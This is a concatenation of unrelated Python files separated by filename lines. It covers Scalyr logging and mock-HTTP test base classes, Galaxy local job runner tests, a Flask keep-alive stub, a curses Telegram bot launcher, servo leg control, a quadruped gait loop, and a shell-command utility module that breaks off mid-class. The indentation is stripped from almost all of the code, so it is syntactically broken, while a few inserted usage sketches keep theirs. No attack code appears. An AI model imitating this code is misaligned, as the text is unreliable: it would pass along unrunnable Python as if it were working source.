"""
# Sleep for 45 seconds since our test suites typically run in less than 15 seconds.
time.sleep(45)
# If we are still alive after this sleep, it means some test is hung or didn't join
# its threads properly. Let's get some information on them.
print("Detected hung test run. Active threads are:")
for t in threading.enumerate():
if t.getName() in ["MainThread", "hung thread watcher"]:
# Exclude itself and main thread
continue
print("Active thread %s daemon=%s" % (t.getName(), six.text_type(t.isDaemon())))
pprint(t.__dict__)
print("Done")
# NOTE: We exit with non-zero here to fail early in Circle CI instead of waiting on build
# timeout (10 minutes)
sys.exit(1)
def _start_thread_watcher_if_necessary():
"""Starts the thread watcher if it hasn't already been started.
"""
global __thread_watcher_started
if not __thread_watcher_started:
thread = threading.Thread(name="hung thread watcher", target=_thread_watcher)
thread.setDaemon(True)
thread.start()
__thread_watcher_started = True
class BaseScalyrTestCase(unittest.TestCase):
"""Used to define ScalyrTestCase below.
This augments the standard TestCase by capturing all logged lines to stdout and
adds protection to help detect hung test threads.
"""
# noinspection PyPep8Naming
def __init__(self, methodName="runTest", verify_setup_invoked=False):
unittest.TestCase.__init__(self, methodName=methodName)
# Add in some code to check to make sure that derived classes invoked this class's `setUp` method if
# they overrode it.
if verify_setup_invoked:
self.__setup_invoked = False
self.addCleanup(self.verify_setup_invoked)
def setUp(self):
# We need to reset the log destinations here because it is only at this point that stdout is replaced with
# whatever object is capturing stdout for this test case.
scalyr_logging.set_log_destination(use_stdout=True)
self.__setup_invoked = True
# Enable keys sort for json.dumps to make it easier to assert on the serialized output
scalyr_util.SORT_KEYS = True
# NOTE: orjson doesn't support sort_keys so we fallback to implementation which supports it
scalyr_util.set_json_lib("json")
def tearDown(self):
scalyr_util.SORT_KEYS = False
# It's important we close all the open FDs used by loggers otherwise tests will fail on
# Windows because the file will still be opened
scalyr_logging.close_handlers()
def run(self, result=None):
_start_thread_watcher_if_necessary()
StoppableThread.set_name_prefix("TestCase %s: " % six.text_type(self))
return unittest.TestCase.run(self, result=result)
def verify_setup_invoked(self):
self.assertTrue(
self.__setup_invoked,
msg="Inherited setUp method was not invoked by class derived from ScalyrTestCase",
)
if sys.version_info[:2] < (2, 7):
class ScalyrTestCase(BaseScalyrTestCase):
"""The base class for Scalyr tests.
This is used mainly to hide differences between the test fixtures available in the various Python
versions.
WARNING: Derived classes that override setUp, must be sure to invoke the inherited setUp method.
"""
# noinspection PyPep8Naming
def __init__(self, methodName="runTest"):
# Do not verify the setup was invoked since it relies on addCleanup which is only available in 2.7
BaseScalyrTestCase.__init__(
self, methodName=methodName, verify_setup_invoked=False
)
def assertIs(self, obj1, obj2, msg=None):
"""Just like self.assertTrue(a is b), but with a nicer default message."""
if obj1 is not obj2:
if msg is None:
msg = "%s is not %s" % (obj1, obj2)
self.fail(msg)
def assertIsNone(self, obj, msg=None):
"""Same as self.assertTrue(obj is None), with a nicer default message."""
if msg is not None:
self.assertTrue(obj is None, msg)
else:
self.assertTrue(obj is None, "%s is not None" % (six.text_type(obj)))
def assertIsNotNone(self, obj, msg=None):
"""Included for symmetry with assertIsNone."""
if msg is not None:
self.assertTrue(obj is not None, msg)
else:
self.assertTrue(obj is not None, "%s is None" % (six.text_type(obj)))
def assertGreater(self, a, b, msg=None):
if msg is not None:
self.assertTrue(a > b, msg)
else:
self.assertTrue(
a > b,
"%s is greater than %s" % (six.text_type(a), six.text_type(b)),
)
def assertLess(self, a, b, msg=None):
if msg is not None:
self.assertTrue(a < b, msg)
else:
self.assertTrue(
a < b,
"%s is greater than %s" % (six.text_type(a), six.text_type(b)),
)
def assertRaisesRegexp(self, exc_cls, expected_msg, func, *args, **kwargs):
"""
Compatibility layer for assertRaisesRegexp which also works under Python 2.6.
"""
try:
func(*args, **kwargs)
except Exception as e:
if not isinstance(e, exc_cls):
raise AssertionError(
'Expected class "%s", got "%s"'
% (exc_cls.__name__, e.__class__.__name__)
)
if not re.search(expected_msg, str(e)):
raise AssertionError(
'Expected "%s" message, got "%s"' % (expected_msg, str(e))
)
else:
class ScalyrTestCase(BaseScalyrTestCase):
"""The base class for Scalyr tests.
This is used mainly to hide differences between the test fixtures available in the various Python
versions.
WARNING: Derived classes that override setUp, must be sure to invoke the inherited setUp method.
"""
# noinspection PyPep8Naming
def __init__(self, methodName="runTest"):
BaseScalyrTestCase.__init__(
self, methodName=methodName, verify_setup_invoked=True
)
def assertIs(self, obj1, obj2, msg=None):
unittest.TestCase.assertIs(self, obj1, obj2, msg=msg)
def assertIsNone(self, obj, msg=None):
unittest.TestCase.assertIsNone(self, obj, msg=msg)
def assertIsNotNone(self, obj, msg=None):
unittest.TestCase.assertIsNotNone(self, obj, msg=msg)
def assertGreater(self, a, b, msg=None):
unittest.TestCase.assertGreater(self, a, b, msg=msg)
def assertLess(self, a, b, msg=None):
unittest.TestCase.assertLess(self, a, b, msg=msg)
class BaseScalyrLogCaptureTestCase(ScalyrTestCase):
"""
Base test class which captures log data produced by code called inside the tests into log
files created in the directory referenced by the "logs_directory" class variable.
The directory available via "logs_directory" is automatically created in a secure, random
fashion for each test invocation inside the setUp() method.
In addition to creating this directory, setUp() also configures agent logging so it logs to
files in that directory.
On tearDown() the log directory is removed if the tests pass and no assertion has failed; if an
assertion fails, the directory is left in place so the developer can inspect the log content,
which might aid with test troubleshooting. A short usage sketch follows this class definition.
"""
# Path to the directory with the agent logs
logs_directory = None # type: Optional[str]
# Path to the main agent log file
agent_log_path = None # type: Optional[str]
# Path to the agent debug log file (populated inside setUp())
agent_debug_log_path = None # type: Optional[str]
# Variable which indicates whether one of the assertLogFile* assertions has failed
# NOTE: Due to us needing to support multiple Python versions and test runners, there is no easy
# and simple test runner agnostic way of detecting if tests have failed
__assertion_failed = False # type: bool
def setUp(self):
super(BaseScalyrLogCaptureTestCase, self).setUp()
self.logs_directory = tempfile.mkdtemp(suffix="agent-tests-log")
scalyr_logging.set_log_destination(
use_disk=True,
logs_directory=self.logs_directory,
agent_log_file_path="agent.log",
agent_debug_log_file_suffix="_debug",
)
scalyr_logging.__log_manager__.set_log_level(scalyr_logging.DEBUG_LEVEL_5)
self.agent_log_path = os.path.join(self.logs_directory, "agent.log")
self.agent_debug_log_path = os.path.join(self.logs_directory, "agent_debug.log")
def tearDown(self):
super(BaseScalyrLogCaptureTestCase, self).tearDown()
# It's important we close all the open FDs used by loggers otherwise tests will fail on
# Windows because the file will still be opened
scalyr_logging.close_handlers()
if self.__assertion_failed:
# Print the paths to which we store the output to so they can be introspected by the
# developer
test_name = self._testMethodName
print(
'Stored agent log file for test "%s" to: %s'
% (test_name, self.agent_log_path)
)
print(
'Stored agent debug log file for test "%s" to: %s'
% (test_name, self.agent_debug_log_path)
)
if not self.__assertion_failed:
shutil.rmtree(self.logs_directory)
def assertLogFileContainsLineRegex(self, expression, file_path=None):
"""
Custom assertion function which asserts that the provided log file path contains a line
which matches the provided line regular expression.
Keep in mind that this function is line oriented. If you want to perform assertion across
multiple lines, you should use "assertLogFileContainsRegex".
:param expression: Regular expression to match against each line in the file.
:param file_path: Path to the file to use. If not specified, it defaults to agent log file.
"""
file_path = file_path or self.agent_log_path
if not self._file_contains_line_regex(
file_path=file_path, expression=expression
):
with open(file_path, "r") as fp:
content = fp.read()
self.__assertion_failed = True
self.fail(
'File "%s" does not contain "%s" line expression.\n\nActual file content: %s'
% (file_path, expression, content)
)
def assertLogFileDoesntContainsLineRegex(self, expression, file_path=None):
"""
Custom assertion function which asserts that the provided log file path doesn't contain a
line which matches the provided line regular expression.
Keep in mind that this function is line oriented. If you want to perform assertion across
multiple lines, you should use "assertLogFileDoesntContainsRegex".
:param expression: Regular expression to match against each line in the file.
:param file_path: Path to the file to use. If not specified, it defaults to agent log file.
"""
file_path = file_path or self.agent_log_path
if self._file_contains_line_regex(file_path=file_path, expression=expression):
with open(file_path, "r") as fp:
content = fp.read()
self.__assertion_failed = True
self.fail(
'File "%s" contains "%s" line expression, but it shouldn\'t.\n\nActual file content: %s'
% (file_path, expression, content)
)
def assertLogFileContainsRegex(self, expression, file_path=None):
"""
Custom assertion function which asserts that the provided log file path contains a string
which matches the provided regular expression.
This function performs checks against the whole file content which means it comes in handy in
scenarios where you need to perform cross line checks.
:param expression: Regular expression to match against the whole file content.
:param file_path: Path to the file to use. If not specified, it defaults to agent log file.
"""
file_path = file_path or self.agent_log_path
if not self._file_contains_regex(file_path=file_path, expression=expression):
with open(file_path, "r") as fp:
content = fp.read()
self.__assertion_failed = True
self.fail(
'File "%s" does not contain "%s" expression.\n\nActual file content: %s'
% (file_path, expression, content)
)
def assertLogFileDoesntContainsRegex(self, expression, file_path=None):
"""
Custom assertion function which asserts that the provided log file path doesn't contain a
string which matches the provided regular expression.
This function performs checks against the whole file content which means it comes in handy in
scenarios where you need to perform cross line checks.
:param expression: Regular expression to match against the whole file content.
:param file_path: Path to the file to use. If not specified, it defaults to agent log file.
"""
file_path = file_path or self.agent_log_path
if self._file_contains_regex(file_path=file_path, expression=expression):
with open(file_path, "r") as fp:
content = fp.read()
self.__assertion_failed = True
self.fail(
'File "%s" contains "%s" expression, but it shouldn\'t.\n\nActual file content: %s'
% (file_path, expression, content)
)
def _file_contains_line_regex(self, file_path, expression):
matcher = re.compile(expression)
with open(file_path, "r") as fp:
for line in fp:
if matcher.search(line):
return True
return False
def _file_contains_regex(self, file_path, expression):
matcher = re.compile(expression)
with open(file_path, "r") as fp:
content = fp.read()
return bool(matcher.search(content))
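# A minimal usage sketch for BaseScalyrLogCaptureTestCase (illustration only, not part of this
# suite): the method is deliberately not named "test_*" so test runners ignore it, and the
# logged message and regular expression below are hypothetical.
class _ExampleLogCaptureUsage(BaseScalyrLogCaptureTestCase):
    def example_assert_on_agent_log(self):
        # Code under test would normally emit log lines through the agent loggers that
        # setUp() pointed at self.logs_directory; here we emit one directly.
        LOG.info("example marker line")
        # Assert against the captured agent log file (defaults to self.agent_log_path).
        self.assertLogFileContainsLineRegex(r"example marker line")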
class ScalyrMockHttpServerTestCase(ScalyrTestCase):
"""
Base Scalyr test case class which starts a mock http server in setUpClass() and stops it in
tearDownClass(). A short usage sketch follows the MockHTTPServer class below.
"""
mock_http_server_thread = None
@classmethod
def setUpClass(cls):
cls.mock_http_server_thread = MockHTTPServer()
cls.mock_http_server_thread.start()
# Give server some time to start up
time.sleep(0.5)
@classmethod
def tearDownClass(cls):
if cls.mock_http_server_thread:
cls.mock_http_server_thread.stop()
def shutdown_flask_server():
from flask import request
func = request.environ["werkzeug.server.shutdown"]
func()
return ""
class MockHTTPServer(StoppableThread):
"""
Mock HTTP server which can be used for tests.
It works by starting a mock HTTP server which serves a flask app on localhost and a random port.
"""
def __init__(self, host="127.0.0.1", port=None):
# type: (str, Optional[int]) -> None
if not port:
port = random.randint(5000, 20000)
super(MockHTTPServer, self).__init__(name="MockHttpServer_%s_%s" % (host, port))
from flask import Flask
self.host = host
self.port = port
# Make sure we run in the background
self.setDaemon(True)
self.app = Flask("mock_app")
self.app.add_url_rule("/shutdown", view_func=shutdown_flask_server)
def run(self):
LOG.info(
"Starting mock http server and listening on: %s:%s" % (self.host, self.port)
)
self.app.run(host=self.host, port=self.port)
super(MockHTTPServer, self).run()
def stop(self, wait_on_join=True, join_timeout=2):
import requests
LOG.info("Stopping mock http server...")
# Sadly there is no better way to kill werkzeug server...
url = "http://%s:%s/shutdown" % (self.host, self.port)
requests.get(url)
self.app.do_teardown_appcontext()
super(MockHTTPServer, self).stop(wait_on_join=True, join_timeout=0.1)
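# A minimal usage sketch for ScalyrMockHttpServerTestCase (illustration only, not part of this
# suite): the method is deliberately not named "test_*" so it is not collected, and the URL it
# requests is hypothetical (only "/shutdown" is actually registered on the mock app).
class _ExampleMockHttpServerUsage(ScalyrMockHttpServerTestCase):
    def example_query_mock_server(self):
        import requests

        server = self.mock_http_server_thread
        base_url = "http://%s:%s" % (server.host, server.port)
        # Any unregistered path should simply return a 404 from the mock Flask app.
        response = requests.get(base_url + "/does-not-exist")
        assert response.status_code == 404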
|
test_runner_local.py
|
import os
import threading
import time
from unittest import TestCase
from galaxy.util import bunch
from galaxy.jobs.runners import local
from galaxy.jobs import metrics
from galaxy import model
from tools_support import (
UsesApp,
UsesTools
)
class TestLocalJobRunner( TestCase, UsesApp, UsesTools ):
def setUp( self ):
self.setup_app()
self._init_tool()
self.app.job_metrics = metrics.JobMetrics()
self.job_wrapper = MockJobWrapper( self.app, self.test_directory, self.tool )
def tearDown( self ):
self.tear_down_app()
def test_run( self ):
self.job_wrapper.command_line = "echo HelloWorld"
runner = local.LocalJobRunner( self.app, 1 )
runner.queue_job( self.job_wrapper )
assert self.job_wrapper.stdout.strip() == "HelloWorld"
def test_galaxy_lib_on_path( self ):
self.job_wrapper.command_line = '''python -c "import galaxy.util"'''
runner = local.LocalJobRunner( self.app, 1 )
runner.queue_job( self.job_wrapper )
assert self.job_wrapper.exit_code == 0
def test_default_slots( self ):
self.job_wrapper.command_line = '''echo $GALAXY_SLOTS'''
runner = local.LocalJobRunner( self.app, 1 )
runner.queue_job( self.job_wrapper )
assert self.job_wrapper.stdout.strip() == "1"
def test_slots_override( self ):
# Set local_slots in job destination to specify slots for
# local job runner.
self.job_wrapper.job_destination.params[ "local_slots" ] = 3
self.job_wrapper.command_line = '''echo $GALAXY_SLOTS'''
runner = local.LocalJobRunner( self.app, 1 )
runner.queue_job( self.job_wrapper )
assert self.job_wrapper.stdout.strip() == "3"
def test_exit_code( self ):
self.job_wrapper.command_line = '''sh -c "exit 4"'''
runner = local.LocalJobRunner( self.app, 1 )
runner.queue_job( self.job_wrapper )
assert self.job_wrapper.exit_code == 4
def test_metadata_gets_set( self ):
runner = local.LocalJobRunner( self.app, 1 )
runner.queue_job( self.job_wrapper )
assert os.path.exists( self.job_wrapper.mock_metadata_path )
def test_metadata_gets_set_if_embedded( self ):
self.job_wrapper.job_destination.params[ "embed_metadata_in_job" ] = "True"
# Kill off cruft for _handle_metadata_externally and make sure job still works...
self.job_wrapper.external_output_metadata = None
self.app.datatypes_registry.set_external_metadata_tool = None
runner = local.LocalJobRunner( self.app, 1 )
runner.queue_job( self.job_wrapper )
assert os.path.exists( self.job_wrapper.mock_metadata_path )
def test_stopping_job( self ):
self.job_wrapper.command_line = '''python -c "import time; time.sleep(15)"'''
runner = local.LocalJobRunner( self.app, 1 )
def queue():
runner.queue_job( self.job_wrapper )
t = threading.Thread(target=queue)
t.start()
while True:
if self.job_wrapper.external_id:
break
time.sleep( .01 )
external_id = self.job_wrapper.external_id
mock_job = bunch.Bunch(
get_external_output_metadata=lambda: None,
get_job_runner_external_id=lambda: str(external_id),
get_id=lambda: 1
)
runner.stop_job( mock_job )
t.join(1)
class MockJobWrapper( object ):
def __init__( self, app, test_directory, tool ):
working_directory = os.path.join( test_directory, "workdir" )
tool_working_directory = os.path.join( working_directory, "working" )
os.makedirs( tool_working_directory )
self.app = app
self.tool = tool
self.requires_containerization = False
self.state = model.Job.states.QUEUED
self.command_line = "echo HelloWorld"
self.environment_variables = []
self.commands_in_new_shell = False
self.prepare_called = False
self.write_version_cmd = None
self.dependency_shell_commands = None
self.working_directory = working_directory
self.tool_working_directory = tool_working_directory
self.requires_setting_metadata = True
self.job_destination = bunch.Bunch( id="default", params={} )
self.galaxy_lib_dir = os.path.abspath( "lib" )
self.job_id = 1
self.external_id = None
self.output_paths = [ '/tmp/output1.dat' ]
self.mock_metadata_path = os.path.abspath( os.path.join( test_directory, "METADATA_SET" ) )
self.metadata_command = "touch %s" % self.mock_metadata_path
self.galaxy_virtual_env = None
self.shell = "/bin/bash"
# Cruft for setting metadata externally, axe at some point.
self.external_output_metadata = bunch.Bunch(
set_job_runner_external_pid=lambda pid, session: None
)
self.app.datatypes_registry.set_external_metadata_tool = bunch.Bunch(
build_dependency_shell_commands=lambda: []
)
def prepare( self ):
self.prepare_called = True
def set_job_destination( self, job_destination, external_id ):
self.external_id = external_id
def get_command_line( self ):
return self.command_line
def get_id_tag( self ):
return "1"
def get_state( self ):
return self.state
def change_state( self, state ):
self.state = state
def get_output_fnames( self ):
return []
def get_job( self ):
return model.Job()
def setup_external_metadata( self, **kwds ):
return self.metadata_command
def get_env_setup_clause( self ):
return ""
def has_limits( self ):
return False
def finish( self, stdout, stderr, exit_code ):
self.stdout = stdout
self.stderr = stderr
self.exit_code = exit_code
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. The bot is online!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
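# A minimal usage sketch, assuming a hypothetical blocking run_bot() callable: call keep_alive()
# once before the blocking call so the Flask server keeps serving from its background thread
# while the bot does its work.
def _example_usage(run_bot):
    keep_alive()  # start the web server on port 8080 in a background thread
    run_bot()     # hypothetical blocking call into the bot framework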
|
pytelebot.py
|
# PoHelper (PoHelper Telegram bot powered by Python)
# Copyright (C) 2022 drlorente97.eth <drlorente97@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# General Declarations
from curses import wrapper
import threading
import time
# Import Modules
import signalHandler
import logger
import dbEngine
import gInterface
import telegramInterface
import messageEngine
# Main code
def main(screen):
# Draw main window
mainWindow = gInterface.intro()
mainWindow.build()
mainWindow.border()
mainWindow.write('PoHelper: Telegram bot powered by Python', y=1, x=1)
mainWindow.write('Copyright (C) 2022 drlorente97.eth <drlorente97@gmail.com>', y=2, x=1)
mainWindow.refresh()
# Draw log window
logBox = gInterface.logbox()
logBox.build()
logBox.scroll_on()
# Init Log Handler
log = logger.Log(logBox)
# Init Signal Handler
sig = signalHandler.signalHandler(log)
# Init Database Engine
db = dbEngine.dbEngine(log)
# Init Telegram Interface
teleInt = telegramInterface.telegramInterface(log, sig.start_shutdown)
# Define worker
def messageEngine_worker(teleInt, log, num):
worker = messageEngine.messageEngine(teleInt, num)
# Define worker threads amount
workerAmount = 1
# Set up Message Engine Threads
worker_threads = []
i = 0
while i < workerAmount:
worker_threads.append(threading.Thread(target=messageEngine_worker, name=str(i+1), args=(teleInt, log, str(i+1))))
i += 1
# Start threads
try:
for thread in worker_threads:
thread.start()
time.sleep(0.1)
while True:
# Watchdog
if sig.start_shutdown.is_set():
break
# Scroll log window
log.logbox.read_key()
except:
log.error('Bot has crashed :(')
sig.start_shutdown.set()
finally:
for thread in worker_threads:
thread.join()
name = thread.getName()
log.warning(f"Message engine thread {name} is stoped")
log.warning("Telebot stoped, have a nice day :)")
if __name__ == '__main__':
# Launch wrapper on main
wrapper(main)
|
LegsControl.py
|
import time
from multiprocessing import Process
import navio.pwm
import navio.util
navio.util.check_apm()
SERVO_MIN = 0.700 # ms
SERVO_MAX = 1.500 # ms
PERIOD = 50
MAX_h1_front = 80
MAX_h1_rear = 130
h1_moving_angle = 70
MIN_h1_front = MAX_h1_front - h1_moving_angle
MIN_h1_rear = MAX_h1_rear - h1_moving_angle
MIN_h2 = 50
MAX_h2_front = 70
MAX_h2_rear = 70
DELAY = 0.01
PWM_UNUSED = 7
class RobotLeg:
def __init__(self, m1, m2, m1_revert=0, m2_revert=0, servoMaxOffset=0, servoMinOffset=0):
self.h1 = navio.pwm.PWM(m1)
self.h2 = navio.pwm.PWM(m2)
self.h1_revert = m1_revert
self.h2_revert = m2_revert
self.servoMaxOffset = servoMaxOffset
self.servoMinOffset = servoMinOffset
# initializing
self.h1.initialize()
self.h2.initialize()
# setting period
self.h1.set_period(PERIOD)
self.h2.set_period(PERIOD)
# enable pwm
self.h1.enable()
self.h2.enable()
def move_h1(self, angle):
self.h1.set_duty_cycle(self.degreeToDuty(angle, revert=self.h1_revert))
def move_h2(self, angle):
self.h2.set_duty_cycle(self.degreeToDuty(angle, revert=self.h2_revert))
def degreeToDuty(self, degree, revert):
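# Maps a joint angle in degrees to a PWM pulse width in milliseconds: a 90-degree range is
# scaled across SERVO_MIN..SERVO_MAX (adjusted by the per-leg offsets). The revert modes
# (1-3) change the direction or offset of the mapping for servos mounted differently; any
# other value uses the default direction.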
if revert == 1:
return (((SERVO_MAX - SERVO_MIN + self.servoMaxOffset - self.servoMinOffset) / 90.) * degree) + SERVO_MAX \
+ self.servoMaxOffset
if revert == 2:
return SERVO_MAX - (((SERVO_MAX - SERVO_MIN + self.servoMaxOffset - self.servoMinOffset) / 90.) * degree) \
+ self.servoMaxOffset
if revert == 3:
return (((SERVO_MAX - SERVO_MIN + self.servoMaxOffset - self.servoMinOffset) / 90.) * (90 - degree)) \
+ SERVO_MAX + self.servoMaxOffset
else:
return (((SERVO_MAX - SERVO_MIN + self.servoMaxOffset - self.servoMinOffset) / 90.) * degree) + SERVO_MIN \
+ self.servoMinOffset
def KeepAlive(pin):
while True:
pin.set_duty_cycle(0.001)
time.sleep(DELAY)
def KeepAliveThread():
unused = navio.pwm.PWM(PWM_UNUSED)
unused.initialize()
unused.set_period(PERIOD)
unused.enable()
try:
KA = Process(target=KeepAlive,args=(unused,))
KA.start()
except:
print "Error: unable to start thread"
|
GaitGenerator.py
|
import numpy as np
import threading
import time
import LegTrajectory as lt
import IK
import TimerIMU as ti
import DynamixelController as dc
class quadrupedGait():
def __init__(self, _leg_centers, _leg_start_states, _body_h, _leg_up_h, _h_offset, _T, _dt, _classIMU):
self.leg_center = _leg_centers
self.leg_cur_states = _leg_start_states
self.leg_pre_states = _leg_start_states
self.theta_list = [
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
]
self.theta_pre_list = [
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
]
self.pre_theta_flag = [False, False, False, False]
self.body_h = _body_h
self.leg_up_h = _leg_up_h
self.h_offset = _h_offset
self.T = _T
self.dt = _dt
self.tIMU = _classIMU
self.target_vel = [0.0, 0.0, 0.0]
self.t_start = [0.0, self.T/2.0, self.T/2.0, 0.0]
self.t_cur_list = [0.0, self.T/2.0, self.T/2.0, 0.0]
self.real_dt = self.dt
self.controll_time = time.time()
dc.setDXL()
dc.torqueON(dc.DXL_ID_LIST)
self.thread = threading.Thread(target=self.trajectoryLoop)
self.thread.start()
def calcBodyVelHorizontal(self):
# Compute the horizontal velocity in the body coordinate frame
rot_inv = self.tIMU.rot.T
vel_world_horizontal = np.array([self.tIMU.v[0], self.tIMU.v[1], 0.0])
vel_body_horizontal = rot_inv@vel_world_horizontal
return vel_body_horizontal
def calcNextLegState(self, vel_body_horizontal, leg_num, t_cur):
p, v, a = lt.calcBalancePVA(
self.leg_cur_states[leg_num],
self.target_vel,
vel_body_horizontal,
self.leg_center[leg_num],
self.body_h,
self.leg_up_h,
self.h_offset,
self.T,
self.dt
)
if(t_cur+self.dt > self.T):
state_next = [p, v, a, 0]
else:
state_next = [p, v, a, t_cur+self.dt]
return state_next
def trajectoryLoop(self):
t = threading.Timer(self.dt, self.trajectoryLoop)
t.start()
time_now = time.time()
self.real_dt = time_now - self.controll_time
vel_b_h = self.calcBodyVelHorizontal()
pos_i = []
for leg_num in range(4):
self.leg_cur_states[leg_num][3] = self.t_cur_list[leg_num]
state_next = self.calcNextLegState(vel_b_h, leg_num, self.t_cur_list[leg_num])
self.theta_list[leg_num], self.pre_theta_flag[leg_num] = IK.legSmartIK(state_next[0], self.theta_pre_list[leg_num], leg_num)
pos_f = dc.DXL_MEDIUM_POSITION_VALUE*np.ones(3) + np.array(self.theta_list[leg_num])*dc.JOINT_DIREC[leg_num]*dc.RAD_2_DXLPOS
pos_i.append(int(pos_f[0]))
pos_i.append(int(pos_f[1]))
pos_i.append(int(pos_f[2]))
self.theta_pre_list[leg_num] = self.theta_list[leg_num]
self.t_cur_list[leg_num] = state_next[3]
dc.syncwritePos(dc.DXL_ID_LIST, pos_i)
self.controll_time = time_now
def main():
leg_centers = [
[0.0, 0.0, -170.0],
[0.0, 0.0, -170.0],
[0.0, 0.0, -170.0],
[0.0, 0.0, -170.0]
]
leg_start_states = [
[[0.0, 0.0, -170.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], 0.0],
[[0.0, 0.0, -170.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], 0.0],
[[0.0, 0.0, -170.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], 0.0],
[[0.0, 0.0, -170.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], 0.0]
]
body_h = 170.0 + IK.sole_r
leg_up_h = 30.0
h_offset = 3.0
T = 0.5
dt = 0.005
tIMU = ti.timerIMU(0.015)
qGait = quadrupedGait(leg_centers, leg_start_states, body_h, leg_up_h, h_offset, T, dt, tIMU)
while(True):
print("-------------------------------")
time.sleep(1)
if __name__ == '__main__':
main()
|
utils.py
|
# encoding: utf-8
from contextlib import contextmanager
import cStringIO
import os
import random
from subprocess import Popen, PIPE, call
import sys
import threading
# ======================= GENERAL UTILITIES =======================
def extract_column(text, column, start=0, sep=None):
""" Extracts columns from a formatted text
:param text:
:param column: the column number: from 0, -1 = last column
:param start: the line number to start with (headers removal)
:param sep: optional separator between words (default is arbitrary number of blanks)
:return: a list of words
"""
lines = text.splitlines() if isinstance(text, basestring) else text
if start:
lines = lines[start:]
values = []
for line in lines:
elts = line.split(sep) if sep else line.split()
if elts and column < len(elts):
values.append(elts[column].strip())
return values
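# Minimal usage sketch for extract_column (illustrative only; the sample text is
# made up): pull a single column out of a "ps"-like listing, skipping the header.
def _example_extract_column():
    text = "PID TTY      TIME CMD\n1   ?    00:00:01 init\n2   ?    00:00:00 kthreadd"
    # start=1 drops the header line; column 0 yields the PIDs -> ['1', '2']
    return extract_column(text, 0, start=1)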
def filter_column(text, column, start=0, sep=None, **kwargs):
""" Filters (like grep) lines of text according to a specified column and operator/value
:param text: a string
:param column: integer >=0
:param sep: optional separator between words (default is arbitrary number of blanks)
:param kwargs: operator=value eg eq='exact match', contains='substring', startswith='prefix' etc...
:return: a list of split lines
"""
if len(kwargs) != 1:
raise TypeError("Missing or too many keyword parameter in filter_column")
op, value = kwargs.items()[0]
if op in ('eq', 'equals'):
op = '__eq__'
elif op in ('contains', 'includes'):
op = '__contains__'
elif not op in ('startswith', 'endswith'):
raise ValueError("Unknown filter_column operator: {}".format(op))
lines = text.splitlines() if isinstance(text, basestring) else text
if start:
lines = lines[start:]
values = []
for line in lines:
elts = line.split(sep) if sep else line.split()
if elts and column < len(elts):
elt = elts[column]
if getattr(elt, op)(value):
values.append(line.strip())
return values
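# Minimal usage sketch for filter_column (illustrative only; the sample text is
# made up): keep only the lines whose first column matches an exact value.
def _example_filter_column():
    text = "eth0 UP   1500\nlo   UP   65536\neth1 DOWN 1500"
    # eq='lo' keeps only the loopback line -> ['lo   UP   65536']
    return filter_column(text, 0, eq='lo')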
class ConfAttrDict(dict):
"""
    A configuration attribute dictionary whose context manager allows items to be
    pushed and pulled, e.g. for temporary configuration overriding.
"""
class __void__: pass
class __raises__: pass
_raises = __raises__
def __getattr__(self, item):
if item in self:
return self[item]
if self._raises is ConfAttrDict.__raises__:
raise AttributeError("{} attribute not found: {}".format(self.__class__.__name__, item))
return self._raises
def copy(self):
return ConfAttrDict(self)
def update(self, E=None, **F):
dict.update(self, E, **F)
return self
def __iadd__(self, other):
return self.update(other)
def __add__(self, other):
return ConfAttrDict(self).update(other)
def __isub__(self, other):
for k in other:
if k in self:
del self[k]
return self
def __sub__(self, other):
return ConfAttrDict(self).__isub__(other)
def _push(self, **kwargs):
if not hasattr(self, '__item_stack'):
self.__item_stack = []
self.__missing_stack = []
self.__item_stack.append({k: self[k] for k in kwargs if k in self})
kkwargs = kwargs
for k in kwargs:
if kwargs[k] is ConfAttrDict.__void__:
if kkwargs is kwargs:
kkwargs = dict(kwargs)
del kkwargs[k]
if k in self:
del self[k]
self.__missing_stack.append([k for k in kkwargs if k not in self])
return self.update(kkwargs)
def _pull(self):
for k in self.__missing_stack.pop():
del self[k]
return self.update(self.__item_stack.pop())
def __call__(self, **kwargs):
return self._push(**kwargs)
def __enter__(self):
return self
def __exit__(self, *args):
self._pull()
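# Minimal usage sketch for ConfAttrDict (illustrative only): attribute-style access
# plus temporary overrides through the push/pull context manager.
def _example_conf_attr_dict():
    conf = ConfAttrDict(host='localhost', port=8080)
    with conf(port=9090, host=ConfAttrDict.__void__):
        # Inside the block 'port' is overridden and 'host' is removed.
        assert conf.port == 9090 and 'host' not in conf
    # On exit the original items are restored.
    return conf.host, conf.port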
def random_id(len=10):
return ''.join(random.choice('0123456789abcdefghijklmnopqrstuvwxyz') for _ in xrange(len))
def mixin_factory(name, base, *mixins):
return type(name, (base,) + mixins, {})
# ======================= OS RELATED UTILITIES =======================
# this is explicitly borrowed from fabric
def _wrap_with(code):
def inner(text, bold=False):
c = code
if bold:
c = "1;%s" % c
return "\033[%sm%s\033[0m" % (c, text)
return inner
red = _wrap_with('31')
green = _wrap_with('32')
yellow = _wrap_with('33')
blue = _wrap_with('34')
magenta = _wrap_with('35')
cyan = _wrap_with('36')
white = _wrap_with('37')
@contextmanager
def cd(folder):
old_folder = os.getcwd()
yield os.chdir(folder)
os.chdir(old_folder)
COMMAND_DEBUG = None
# COMMAND_DEBUG = 'Debug: '
class Command(object):
""" Use this class if you want to wait and get shell command output
"""
def __init__(self, cmd, show=COMMAND_DEBUG):
self.show = show
self.p = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
self.out_buf = cStringIO.StringIO()
self.err_buff = cStringIO.StringIO()
t_out = threading.Thread(target=self.out_handler)
